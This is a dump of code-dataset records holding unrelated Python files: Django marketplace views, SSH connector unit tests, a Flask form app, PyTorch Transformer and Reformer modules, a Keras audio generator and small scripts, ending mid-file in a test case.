product,\n # any other user trying to access the edit form will be shown a 404 error\n if request.user != instance.user:\n raise Http404\n\n form = ProductForm(request.POST or None, request.FILES or None, instance=instance)\n\n if request.method == 'POST':\n try:\n form.save()\n messages.success(request, 'Product updated')\n return HttpResponseRedirect(reverse('listings'))\n except ValueError:\n pass\n\n return render_to_response(\"products/edit.html\", locals(), context_instance=RequestContext(request))\n# view single product listings\ndef single(request, id, slug):\n product = Product.objects.get(id=id, slug=slug)\n images = product.productimage_set.all()\n comment_form = CommentForm(request.POST)\n comments = Comment.objects.filter(product=product)\n\n if request.user.is_authenticated():\n downloadable = request.user.has_purchased(product)\n\n edit = True\n\n return render_to_response(\"products/single.html\", locals(), context_instance=RequestContext(request))\n# activate products after creation\ndef activate_product(request, id):\n product = Product.objects.get(id=id)\n product.status = Product.ACTIVE\n product.save()\n return HttpResponseRedirect(reverse('listings'))\n# diactivate products\ndef deactivate_product(request, id):\n product = Product.objects.get(id=id)\n product.status = Product.INACTIVE\n product.save()\n return HttpResponseRedirect(reverse('listings'))\n# add comments on single product page\ndef comment(request, id):\n product = Product.objects.get(id=id)\n if request.method == 'POST':\n try:\n comment = CommentForm(request.POST, instance=Comment(product=product, user=request.user))\n comment.save()\n except ValueError: # handle validation errors\n return render_to_response(\"products/single.html\", locals(), context_instance=RequestContext(request))\n\n return HttpResponseRedirect(product_url(product))\n# manage coupons associated with a product\ndef manage_coupons(request, id):\n product = Product.objects.get(id=id)\n\n if request.user != product.user:\n raise Http404\n\n # Products are fill-in at this stage instead just before save(), so that\n # we can have a validation depending on it (see CouponForm#clean_discount).\n params = fill_in_product_id(request.POST, product.pk)\n\n queryset = Coupon.objects.filter(product=product)\n CouponFormset = modelformset_factory(Coupon, form=CouponForm, can_delete=True)\n formset = CouponFormset(params or None, queryset=queryset)\n\n if request.method == 'POST' and formset.is_valid():\n try:\n coupons = formset.save(commit=False)\n for coupon in coupons:\n # Make sure the user is creating a coupon for her own product.\n if coupon.product.user != request.user:\n return HttpResponseForbidden()\n coupon.save()\n return HttpResponseRedirect(reverse('manage_coupons', args=[product.id]))\n except ValueError: # handle validation errors\n pass\n\n return render_to_response(\"products/manage_coupons.html\", locals(), context_instance=RequestContext(request))\n# escrow process: allowing users to mark a bought product as received\ndef mark_as_received(request, id):\n product = get_object_or_404(Product, id=id)\n\n # Only the buyer should be able to do that.\n if product.purchase.user != request.user:\n return HttpResponseForbidden()\n\n product.status = Product.RECEIVED\n product.save()\n\n return HttpResponseRedirect(reverse('mypurchases'))\n\ndef fill_in_product_id(params, product_id):\n params = params.copy()\n\n for i in range(int(params.get('form-MAX_NUM_FORMS', 0))):\n if params.get('form-%s-discount' % i):\n params['form-%s-product' % i] = product_id\n else:\n break\n\n return params\n# ability to sort by price\ndef _order(request):\n order = request.GET.get('order')\n if order in ['price', '-price']:\n return order\n return 'price' # the default sorting order\n# allow users to paginate and set pagination threshold to 15\ndef _paginate(products, request):\n paginator = Paginator(products, 15)\n\n page = request.GET.get('page')\n try:\n return paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n return paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n return paginator.page(paginator.num_pages)\n","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"293340619","text":"import logging\nimport unittest\nimport os\nfrom zensols.hostcon import Connector, AppConfig\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger('zensols.hostcon.test')\n\n\nclass TestConnector(unittest.TestCase):\n def setUp(self):\n self.conf = AppConfig('test-resources/test.conf')\n self.conf2 = AppConfig('test-resources/test2.conf')\n self.conf_mnt = AppConfig('test-resources/test-mount.conf')\n self.defparams = {'ssh_switches': '-X -Y',\n 'host_name': 'host1',\n 'ssh_port': '20',\n 'user_name': 'u1'}\n\n def params(self, to_update):\n params = self.defparams.copy()\n params.update(to_update)\n return params\n\n def test_domain(self):\n conn = Connector(self.conf, 'host1.example.com', user_name='u1')\n params = conn.get_params()\n update = {'ssh_port': '23', 'host_name': 'host1.example.com'}\n self.assertEqual(self.params(update), params)\n\n def test_var_subs(self):\n conn = Connector(self.conf, 'host3.example.com', user_name='u1')\n os.environ['HOSTCON_TEST_VAR'] = 'hostcon_test_var'\n params = conn.get_params()\n self.assertEqual(self.params({'host_name': 'hostcon_test_var', 'ssh_port': '26'}), params)\n\n def test_no_domain(self):\n conn = Connector(self.conf, 'host1', user_name='u1')\n params = conn.get_params()\n self.assertEqual(self.params({'ssh_port': '24'}), params)\n\n def test_domain_no_host(self):\n conn = Connector(self.conf, 'host-nonexists')\n params = conn.get_params()\n ssh_port = params['ssh_port']\n self.assertEqual('22', ssh_port)\n\n def test_host_alias(self):\n conn = Connector(self.conf, 'host2.example.com', user_name='u1')\n params = conn.get_params()\n self.assertEqual(self.params({'host_name': 'otherhost', 'ssh_port': '25'}), params)\n\n def test_user_override(self):\n conn = Connector(self.conf2, 'host3.example.com', user_name='otheruser')\n params = conn.get_params()\n correct = self.params({'user_name': 'otheruser', 'ssh_switches': None})\n self.assertEqual(correct, params)\n\n def test_commands(self):\n conn = Connector(self.conf, 'host2.example.com', user_name='usr')\n self.assertEqual(['ssh -X -Y -f -p 25 usr@otherhost /usr/bin/xterm'], conn.get_commands('xterm'))\n self.assertEqual(['ssh -X -Y -f -p 25 usr@otherhost /usr/local/emacs/bin/emacs'], conn.get_commands('emacs'))\n self.assertEqual(['ssh -X -Y -p 25 usr@otherhost'], conn.get_commands('login'))\n\n def test_commands_no_alias(self):\n conn = Connector(self.conf2, 'host2.example.com', user_name='u')\n self.assertEqual(['ssh -f -p 25 u@otherhost /usr/bin/xterm'], conn.get_commands('xterm'))\n\n def test_mount_params(self):\n conn = Connector(self.conf_mnt, 'host1.example.com', user_name='u1')\n params = conn.get_params()\n params.update(conn.get_params(section_prefix='m1', command_keys=conn.mount_keys))\n update = {'remote_mount_point': 'rmp',\n 'local_mount_point': 'lmp',\n 'host_name': 'host1.example.com'}\n self.assertEqual(self.params(update), params)\n\n def test_mount(self):\n conn = Connector(self.conf_mnt, 'host2.example.com', user_name='u1')\n cmds = ['sshfs u1@host2.example.com:rmp lmp -oport=20,mnt_opts,volname=m1',\n 'sshfs u1@host2.example.com:rmp2 lmp2 -oport=20,mnt_opts,volname=m2']\n self.assertEqual(cmds, conn.get_commands('mount'))\n","sub_path":"test/python/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"600125540","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\nimport os\n\nfrom flask import Flask, redirect, url_for, render_template, request, flash\nfrom load_model import find_if_dropout\n\napp = Flask(__name__)\n@app.route('/')\ndef home():\n return render_template(\"main.html\")\n\n@app.route('/res', methods = ['GET','POST'])\ndef my_form_post():\n ar_1 = request.form['income']\n ar_2 = request.form['disability']\n ar_3 = request.form['class']\n ar_4 = request.form['m1']\n ar_5 = request.form['m2']\n ar_6 = request.form['m3']\n ar_7 = request.form['attendence']\n\n ar = [[ar_1, ar_2, ar_3, ar_4, ar_5, ar_6, ar_7]]\n\n result = find_if_dropout(*ar)\n return render_template(\"res.html\", r=result)\n\nif __name__==\"__main__\":\n app.run(debug=True)\n\n\n\n\n","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"353119083","text":"import matplotlib.pyplot as plt\nimport csv\n\nwith open('results/step2_results_la_republica.csv', 'rt', encoding=\"utf8\") as csvfile:\n reader = csv.DictReader(csvfile)\n y_total_news = []\n x_months = []\n x_ticks = [] \n contador = 0 \n for row in reader:\n y_total_news.append(float(row['epu_news_rel']))\n x_months.append(row['date']) \n x_ticks.append(contador) \n contador += 1\n\n print (\"genero la grafica \\n\")\n # y_total_news.sort()\n plt.plot(x_months , y_total_news) \n plt.title('EPU para ' + row['newspaper'])\n plt.axis([\"10-2011\",\"10-2014\", 0, 0.015])\n plt.show()","sub_path":"baker/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"589352807","text":"# -*- coding: utf-8 -*-\r\nimport unittest\r\nfrom Regression_Case import MarkCreate_Automation as Automation_Case\r\nimport sys\r\n\r\nlist = unittest.TestLoader().getTestCaseNames(Automation_Case)\r\ntestCaseParse = sys.argv[1]\r\ndiffstr = ''\r\nchangeLine = '\\r\\n'\r\nfor index in list:\r\n\tif testCaseParse in index:\r\n\t\tstr = \" def \" + index + \"(self):\" + changeLine\r\n\t\tstr = str + \" Automation_Case.\" + index + \"(self)\" + changeLine + changeLine\r\n\t\tdiffstr = diffstr + str\r\n\r\n\r\n\r\n# PG_regression_test.py PG_regression_tmp.txt\r\n\r\nwith open('PG_regression_tmp.txt', 'r') as file:\r\n\tfiledata = file.read()\r\n\r\nfiledata = filedata.replace('@@@diff@@@', diffstr)\r\n\r\nwith open('PG_regression_test.py', 'w') as file:\r\n\tfile.write(filedata)\r\n\r\nfile.close()\r\n\r\n","sub_path":"PGTransfer.py","file_name":"PGTransfer.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"86495264","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nfrom django.db import models\nfrom django.utils.encoding import python_2_unicode_compatible\nimport json\nfrom django.contrib.auth.models import User\nfrom collections import OrderedDict\nfrom .utils import get_practitioner, get_pecos_individual_affliliation\n\n\n@python_2_unicode_compatible\nclass Address(models.Model):\n npi = models.CharField(max_length=10, default=\"\",\n blank=True)\n fhir_json_snipit = models.TextField(max_length=2000, default=\"\")\n\n\n def __str__(self):\n try:\n j = json.loads(self.fhir_json_snipit)\n address=\"\"\n for l in j['line']:\n address = address + l + \" \"\n\n address = address + \" \" + j['city'] + \" \" + j['state'] + \" \" \\\n + j['postalCode'] + \" \" + j['country'] + \\\n \" (\" + j['use'] + \")\"\n return address\n\n except ValueError:\n return \"%s\" % (self.id)\n except:\n return \"%s\" % (self.id)\n def as_dict(self):\n result = {}\n try:\n j = json.loads(self.fhir_json_snipit)\n result['line_1'] = j['line'][0]\n result['line_2'] = j['line'][1]\n result['city'] = j['city']\n result['state'] = j['state']\n result['postal_code'] = j['postalCode']\n result['use'] = j['use']\n result['country'] = j['country']\n return result\n except:\n return {}\n\n\n def line_1(self):\n try:\n j = json.loads(self.fhir_json_snipit)\n line = j['line'][0]\n return line\n except:\n return \"\"\n def line_2(self):\n try:\n j = json.loads(self.fhir_json_snipit)\n line = j['line'][1]\n return line\n except:\n return \"\"\n\n\n\n def city(self):\n try:\n j = json.loads(self.fhir_json_snipit)\n return j['city']\n except:\n return \"\"\n\n def state(self):\n try:\n j = json.loads(self.fhir_json_snipit)\n return j['state']\n except:\n return \"\"\n\n\n def postal_code(self):\n try:\n j = json.loads(self.fhir_json_snipit)\n return j['postalCode']\n except:\n return \"\"\n def country(self):\n try:\n j = json.loads(self.fhir_json_snipit)\n return j['country']\n except:\n return \"\"\n\n def use(self):\n try:\n j = json.loads(self.fhir_json_snipit)\n return j['use']\n except:\n return \"\"\n\n\n\n@python_2_unicode_compatible\nclass Taxonomy(models.Model):\n npi = models.CharField(max_length=10, default=\"\",\n blank=True)\n fhir_json_snipit = models.TextField(max_length=2000, default=\"\")\n\n\n def __str__(self):\n return \"%s\" % (self.id)\n\n@python_2_unicode_compatible\nclass License(models.Model):\n npi = models.CharField(max_length=10, default=\"\",\n blank=True)\n fhir_json_snipit = models.TextField(max_length=2000, default=\"\")\n\n\n def __str__(self):\n return \"%s\" % (self.id)\n\n@python_2_unicode_compatible\nclass Affiliation(models.Model):\n npi = models.CharField(max_length=10, default=\"\",\n blank=True)\n fhir_json_snipit = models.TextField(max_length=2000, default=\"\")\n\n\n def __str__(self):\n return \"%s\" % (self.id)\n\n def as_dict(self):\n result = {}\n try:\n j = json.loads(self.fhir_json_snipit)\n result['line_1'] = j['line'][0]\n result['line_2'] = j['line'][1]\n result['city'] = j['city']\n result['state'] = j['state']\n result['postal_code'] = j['postalCode']\n result['use'] = j['use']\n result['country'] = j['country']\n return result\n except:\n return {}\n\n def npi(self):\n try:\n j = json.loads(self.fhir_json_snipit)\n return j['npi']\n except:\n return \"\"\n\n\n def postal_code(self):\n try:\n j = json.loads(self.fhir_json_snipit)\n return j['postalCode']\n except:\n return \"\"\n\n\n\n@python_2_unicode_compatible\nclass Practitioner(models.Model):\n user = models.ForeignKey(User, blank= True, null=True)\n npi = models.CharField(max_length=10, default=\"\",\n unique=True,\n )\n fhir_id = models.CharField(max_length=24, default=\"\",\n unique=True,\n verbose_name=\"FHIR ID\")\n first_name = models.CharField(max_length=256, default=\"\",\n blank=True)\n last_name = models.CharField(max_length=256, default=\"\",\n blank =True)\n doing_business_as = models.CharField(max_length=256, default=\"\",\n blank=True)\n\n def __str__(self):\n return \"%s %s\" % (self.first_name, self.last_name)\n\n def name_to_fhir(self):\n names =[ ]\n name = OrderedDict()\n name['given'] = self.first_name\n name['family'] = self.last_name\n names.append(name)\n return names\n\n\n def to_fhir(self):\n pfhir = OrderedDict()\n pfhir.update(get_practitioner(self.npi))\n pfhir.update(get_pecos_individual_affliliation(self.npi))\n\n addresses = Address.objects.filter(npi=self.npi)\n address= []\n for a in addresses:\n address.append(json.loads(a.fhir_json_snipit))\n\n affiliations = Affiliation.objects.filter(npi=self.npi)\n affiliation= []\n for a in affiliations:\n affiliation.append(json.loads(a.fhir_json_snipit))\n\n\n\n #Override our changes\n pfhir['address'] = address\n pfhir['affiliation'] = affiliation\n pfhir['name'] = self.name_to_fhir()\n #Bump the version\n pfhir['meta']['version'] = pfhir['meta']['version'] + 1\n return pfhir\n\n\n def to_fhir_json(self):\n return json.dumps(self.to_fhir(), indent=4)\n\n\n\n@python_2_unicode_compatible\nclass Organization(models.Model):\n npi = models.CharField(max_length=10, default=\"\")\n fhir_id = models.CharField(max_length=24, default=\"\")\n organization_name = models.CharField(max_length=256, default=\"\")\n doing_business_as = models.CharField(max_length=256, default=\"\")\n\n def __str__(self):\n return \"%s\" % (self.organization_name)\n","sub_path":"apps/provider/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"559730615","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math, copy\nimport reformer\nimport util\n\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nfrom torch.autograd import Variable\n\n\n\"\"\"\nCS224N course project model implementation: Transformer\n\"\"\"\n\ndef clones(module, N):\n \"Produce N identical layers.\"\n return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\n\ndef attention(query, key, value, mask=None, dropout=0.0):\n \"Compute 'Scaled Dot Product Attention'\"\n d_k = query.size(-1)\n scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)\n\n if mask is not None:\n scores = scores.masked_fill(mask == 0, -1e9)\n p_attn = F.softmax(scores, dim = -1)\n # (Dropout described below)\n p_attn = F.dropout(p_attn, p=dropout)\n return torch.matmul(p_attn, value), p_attn\n\nclass LayerNorm(nn.Module):\n \"Construct a layernorm module (See citation for details).\"\n def __init__(self, features, eps=1e-6):\n super(LayerNorm, self).__init__()\n self.a_2 = nn.Parameter(torch.ones(features))\n self.b_2 = nn.Parameter(torch.zeros(features))\n self.eps = eps\n\n def forward(self, x):\n mean = x.mean(-1, keepdim=True)\n std = x.std(-1, keepdim=True)\n return self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n \nclass SublayerConnection(nn.Module):\n \"\"\"\n A residual connection followed by a layer norm.\n Note for code simplicity we apply the norm first as opposed to last.\n \"\"\"\n def __init__(self, size, dropout):\n super(SublayerConnection, self).__init__()\n self.norm = LayerNorm(size)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, sublayer):\n \"Apply residual connection to any sublayer function that maintains the same size.\"\n return x + self.dropout(sublayer(self.norm(x)))\n\n\nclass PositionwiseFeedForward(nn.Module):\n \"Implements FFN equation.\"\n def __init__(self, d_model, d_ff, dropout=0.1):\n super(PositionwiseFeedForward, self).__init__()\n # Torch linears have a `b` by default. \n self.w_1 = nn.Linear(d_model, d_ff)\n self.w_2 = nn.Linear(d_ff, d_model)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n return self.w_2(self.dropout(F.relu(self.w_1(x))))\n \nclass MultiHeadedAttention(nn.Module):\n def __init__(self, h, d_model, dropout=0.1):\n \"Take in model size and number of heads.\"\n super(MultiHeadedAttention, self).__init__()\n assert d_model % h == 0\n # We assume d_v always equals d_k\n self.d_k = d_model // h\n self.h = h\n self.p = dropout\n self.linears = clones(nn.Linear(d_model, d_model), 4)\n self.attn = None\n \n def forward(self, query, key, value, mask=None):\n \"Implements Figure 2\"\n if mask is not None:\n # Same mask applied to all h heads.\n mask = mask.unsqueeze(1)\n nbatches = query.size(0)\n \n # 1) Do all the linear projections in batch from d_model => h x d_k \n query, key, value = [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)\n for l, x in zip(self.linears, (query, key, value))]\n \n # 2) Apply attention on all the projected vectors in batch. \n x, self.attn = attention(query, key, value, mask=mask, dropout=self.p)\n \n # 3) \"Concat\" using a view and apply a final linear. \n x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k)\n return self.linears[-1](x)\n\nclass PositionalEncoding(nn.Module):\n \"Implement the PE function.\"\n def __init__(self, d_model, dropout, max_len=5000):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n \n # Compute the positional encodings once in log space.\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len).unsqueeze(1)\n div_term = torch.exp(torch.arange(0, d_model, 2) *\n -(math.log(10000.0) / d_model))\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n pe = pe.unsqueeze(0)\n self.register_buffer('pe', pe)\n \n def forward(self, x):\n x = x + Variable(self.pe[:, :x.size(1)], requires_grad=False)\n return self.dropout(x)\n\nclass EncoderLayer(nn.Module):\n \"\"\"\n Encoder is made up of two sublayers, self-attn and feed forward (defined below)\n b blocks of cnn sublayers, each with c Conv1d \n \"\"\"\n\n # N=6, d_model=512, d_ff=2048, h=8, dropout=0.1\n def __init__(self, size=512, d_ff=2048, h=8, dropout=0.1, kernel = 7, c = 4):\n super(EncoderLayer, self).__init__()\n self.c = c\n \n self.conv1d = nn.Sequential(\n nn.Conv1d(size, size, kernel, bias=True, padding=kernel//2),\n nn.ReLU()\n )\n \n self.self_attn = MultiHeadedAttention(h, size, dropout)\n self.feed_forward = PositionwiseFeedForward(size, d_ff, dropout)\n self.sublayer = clones(SublayerConnection(size, dropout), self.c + 2)\n self.size = size\n\n def forward(self, x, mask):\n \"Follow Figure 1 (left) for connections.\"\n\n # convolution\n for i in range(self.c):\n x = self.conv1d(x.transpose(1,2))\n #x = torch.max(x, dim=2)\n x = x.transpose(1,2)\n x = self.sublayer[i](x, lambda x: x)\n \n x = self.sublayer[self.c](x, lambda x: self.self_attn(x, x, x, mask))\n return self.sublayer[self.c+1](x, self.feed_forward)\n\nclass TransformerEncoder(nn.Module):\n \"\"\"\n The transformer encoder part described in 'Attention is all you need'\n b blocks of cnn sublayers, each with c Conv1d \n \"\"\"\n def __init__(self, hidden_size, N = 1, c = 4):\n super(TransformerEncoder, self).__init__()\n self.layer = EncoderLayer(size = hidden_size, c = c)\n self.layers = clones(self.layer, N)\n self.norm = LayerNorm(self.layer.size)\n\n def forward(self, x, mask):\n \"\"\"\n Pass the input (and mask) through each layer in turn.\n \"\"\"\n\n # haroldmei\n mask = torch.unsqueeze(mask, 1)\n\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)\n\n\n# just copied from BiDAFOutput\nclass Transformer_Output(nn.Module):\n \"\"\"\n \"\"\"\n def __init__(self, hidden_size, drop_prob):\n super(Transformer_Output, self).__init__()\n\n self.transformer = TransformerEncoder(hidden_size, N = 3) \n \n self.att_linear_1 = nn.Linear(4 * hidden_size, 1)\n self.mod_linear_1 = nn.Linear(hidden_size, 1)\n\n self.att_linear_2 = nn.Linear(4 * hidden_size, 1)\n self.mod_linear_2 = nn.Linear(hidden_size, 1)\n\n def forward(self, att, mod, mask):\n # Shapes: (batch_size, seq_len, 1)\n logits_1 = self.att_linear_1(att) + self.mod_linear_1(mod)\n mod_2 = self.transformer(mod, mask)\n logits_2 = self.att_linear_2(att) + self.mod_linear_2(mod_2)\n\n # Shapes: (batch_size, seq_len)\n log_p1 = util.masked_softmax(logits_1.squeeze(), mask, log_softmax=True)\n log_p2 = util.masked_softmax(logits_2.squeeze(), mask, log_softmax=True)\n\n return log_p1, log_p2\n\n\nclass TransformerEncoderLayerEx(nn.Module):\n def __init__(self, d_model, dropout=0.1, c = 4, kernel = 7):\n super(TransformerEncoderLayerEx, self).__init__()\n self.c = c\n\n self.conv1d = [nn.Sequential(\n nn.Conv1d(d_model, d_model, kernel, bias=True, padding=kernel//2).cuda(),\n nn.ReLU()\n )] * self.c\n\n self.norm3 = [nn.modules.transformer.LayerNorm(d_model)] * self.c\n self.dropout3 = [nn.modules.transformer.Dropout(dropout)] * self.c\n\n def forward(self, src, src_mask=None, src_key_padding_mask=None):\n for i in range(self.c):\n src2 = self.conv1d[i](src.transpose(1,2)).transpose(1,2)\n src = src + self.dropout3[i](src2)\n src = self.norm3[i](src)\n\n return src\n\n# just copied from BiDAFOutput\nclass Transformer_OutputEx(nn.Module):\n \"\"\"\n \"\"\"\n def __init__(self, hidden_size, mod_layers, drop_prob):\n super(Transformer_OutputEx, self).__init__()\n self.cnn = TransformerEncoderLayerEx(hidden_size,c=2)\n self.transformer = nn.modules.transformer.TransformerEncoder(\n nn.modules.transformer.TransformerEncoderLayer(hidden_size, 8, dropout=drop_prob), \n mod_layers, \n nn.modules.transformer.LayerNorm(hidden_size)\n )\n \n self.att_linear_1 = nn.Linear(4 * hidden_size, 1)\n self.mod_linear_1 = nn.Linear(hidden_size, 1)\n\n self.att_linear_2 = nn.Linear(4 * hidden_size, 1)\n self.mod_linear_2 = nn.Linear(hidden_size, 1)\n\n def forward(self, att, mod, mask):\n # Shapes: (batch_size, seq_len, 1)\n logits_1 = self.att_linear_1(att) + self.mod_linear_1(mod)\n mod_2 = self.transformer(self.cnn(mod)) #, mask)\n logits_2 = self.att_linear_2(att) + self.mod_linear_2(mod_2)\n\n # Shapes: (batch_size, seq_len)\n log_p1 = util.masked_softmax(logits_1.squeeze(), mask, log_softmax=True)\n log_p2 = util.masked_softmax(logits_2.squeeze(), mask, log_softmax=True)\n\n return log_p1, log_p2\n\n\n\n\"\"\"\nCS224N course project model implementation: Reformer\n\"\"\"\nclass ReformerEncoder(nn.Module):\n \"\"\"\n The Reformer encoder part described in ''\n \"\"\"\n def __init__(self, hidden_size, depth = 12, drop_prob=0.1, bucket_size = 16, max_seq_len=512):\n super(ReformerEncoder, self).__init__()\n self.reformer = reformer.Reformer(\n dim = hidden_size,\n depth = depth,\n bucket_size = bucket_size, \n max_seq_len = max_seq_len,\n heads = 8,\n lsh_dropout = drop_prob,\n causal = False\n ).cuda()\n self.bucket_size = bucket_size\n\n def forward(self, x, mask):\n x = self.reformer(x)\n return x\n\n\n\n# just copied from BiDAFOutput\nclass Reformer_Output(nn.Module):\n \"\"\"\n \"\"\"\n def __init__(self, hidden_size, drop_prob):\n super(Reformer_Output, self).__init__()\n\n self.transformer = ReformerEncoder(hidden_size, depth = 1) \n \n self.att_linear_1 = nn.Linear(4 * hidden_size, 1)\n self.mod_linear_1 = nn.Linear(hidden_size, 1)\n\n self.att_linear_2 = nn.Linear(4 * hidden_size, 1)\n self.mod_linear_2 = nn.Linear(hidden_size, 1)\n\n def forward(self, att, mod, mask):\n # Shapes: (batch_size, seq_len, 1)\n logits_1 = self.att_linear_1(att) + self.mod_linear_1(mod)\n mod_2 = self.transformer(mod, mask)\n logits_2 = self.att_linear_2(att) + self.mod_linear_2(mod_2)\n\n # Shapes: (batch_size, seq_len)\n log_p1 = util.masked_softmax(logits_1.squeeze(), mask, log_softmax=True)\n log_p2 = util.masked_softmax(logits_2.squeeze(), mask, log_softmax=True)\n\n return log_p1, log_p2","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":11154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"446520510","text":"# encoding=utf8\n\nimport librosa\nimport numpy as np\nimport random\n\nfrom keras.utils import to_categorical\nfrom keras.preprocessing import image\n\nfrom data_split import SPLIT_SEP\nfrom fe_and_augmentation import Augmentataion, LABEL_INDEX, LEGAL_LABELS\nimport pickle\nimport os\n\nn_classes = len(LEGAL_LABELS)\n\nSAMPLE_RATE = 16000\nSAMPLE_LENGTH = 16000\n\nTEST_LENGTH = 100\n\nEPS = 1e-8\n\nfrom fe_and_augmentation import NOISE, STRETCH, PITCH, SHIFT_TIME\nfrom fe_and_augmentation import SPEC\nfrom fe_and_augmentation import conduct_fe, conduct_augmentation\n\nORIGINAL = 'original'\n\n\nfrom ipdb import set_trace as st\n\n\nclass AudioGenerator(object):\n def __init__(self, root_dir, k, batch_size, train_or_valid, enhance):\n self.root_dir = root_dir\n self.k = k\n self.batch_size = batch_size\n self.train_or_valid = train_or_valid\n self.enhance = enhance\n self.ori_data = self.get_ori_data()\n self.aug_data = {}\n self.steps_per_epoch = len(self.ori_data['data']) // self.batch_size\n\n def load_pkl_data(self, path):\n return pickle.load(open(path, 'rb'))\n\n def get_ori_data(self):\n print('...Load original data begin')\n if self.train_or_valid=='train':\n path = self.root_dir + 'fold{0}/enhance{1}_train.pkl'.format(self.k, self.enhance)\n if self.train_or_valid=='valid':\n path = self.root_dir + 'fold{0}/valid.pkl'.format(self.k)\n data = self.load_pkl_data(path)\n if self.train_or_valid=='train':\n data['data'] = np.array(data['data'])\n if self.train_or_valid=='valid':\n data['data'] = conduct_fe(data['data'], SPEC)\n data['label'] = to_categorical(data['label'], n_classes)\n print('...Load original data done')\n return data\n\n def conduct_augmentation_each_epoch(self, data):\n return conduct_augmentation(data)\n\n def conduct_fe_each_epoch(self, data):\n return conduct_fe(data, SPEC)\n\n def generator(self):\n idx_range = list(range(len(self.ori_data['data'])))\n idx_max = len(self.ori_data['data']) - 1\n while 1:\n # Do shuffle\n random.shuffle(idx_range)\n\n # Do train epochs\n for offset in range(0, idx_max, self.batch_size):\n\n # batch index\n begin = offset\n end = offset + self.batch_size if (offset + self.batch_size) <= idx_max else idx_max\n\n # batch data and label\n batch_data = self.ori_data['data'][idx_range[begin:end]]\n batch_data = self.conduct_augmentation_each_epoch(batch_data)\n batch_data = self.conduct_fe_each_epoch(batch_data)\n batch_label = self.ori_data['label'][idx_range[begin:end]]\n\n # Reshape batch data and yield\n yield batch_data.reshape(tuple(list(batch_data.shape) + [1])).astype('float32'), batch_label\n","sub_path":"kaggle/audio-recognition/script/data_generator_enhance.py","file_name":"data_generator_enhance.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"412652346","text":"# APPROACH - Greedy Solution\n# Time Complexity : O(n), n: length of nums\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : None\n#\n#\n# Your code here along with comments explaining your approach\n# 1. Basically trying to see if the destination is reachable from any of the ind. Then it goes on till we check if soe ind is reachable from start\n# 2. Initially the destination is the last ind of nums. check from backwards if any of the ind, can be jumped from to rach this destination\n# 3. If so, then we update the destination to that ind and check from there backwards for any ind which can be jumped from to reach this new destination\n# 4. Keep doing this till you reach the destination as 0 (TRUE) or search ends at first index (FALSE)\n\nclass Solution:\n def canJump(self, nums: List[int]) -> bool:\n \n if nums is None or len(nums) < 1:\n return False\n \n destination = len(nums) - 1\n for ind in range(len(nums) - 2, -1, -1):\n if ind + nums[ind] >= destination:\n destination = ind\n \n if destination == 0:\n return True\n else:\n return False\n","sub_path":"Problem-1_Jump_Game.py","file_name":"Problem-1_Jump_Game.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"221752767","text":"from loginC import app\n\nfrom flask_principal import identity_loaded\nfrom test_helper import login,_on_principal_initL, logout, TEST_USER_LIDER, TEST_PASS_LIDER\nimport unittest\nimport datetime\nfrom test.test_helper import seleccionar_proyecto\n\nTODAY = datetime.date.today()\nPROYECTOID = 23\nnro_orden = 4\nnombre = 'TEST FASE 4'\ndescripcion = 'test fase 4 des'\nestado = 'I'\nfecha_inicio = TODAY\nfecha_fin = '2014-05-20'\nid_proyecto = PROYECTOID\nPATRON = nombre\nPARAM = 'nombre'\n\nclass FaseTestCase(unittest.TestCase):\n \"\"\"Clase que implementa los test para el caso de uso Fase.\"\"\"\n \n def setUp(self):\n \"\"\"se llama al metodo antes de iniciar el test\"\"\" \n self.client = app.test_client()\n self.acceso = login(self.client, TEST_USER_LIDER, TEST_PASS_LIDER)\n identity_loaded.connect(_on_principal_initL)\n self.proyse= seleccionar_proyecto(self.client, PROYECTOID)\n with app.test_client() as c:\n with c.session_transaction() as sess:\n sess['pry'] = PROYECTOID\n\n def tearDown(self):\n \"\"\" se llama al metodo al terminar el test\"\"\"\n self.salir 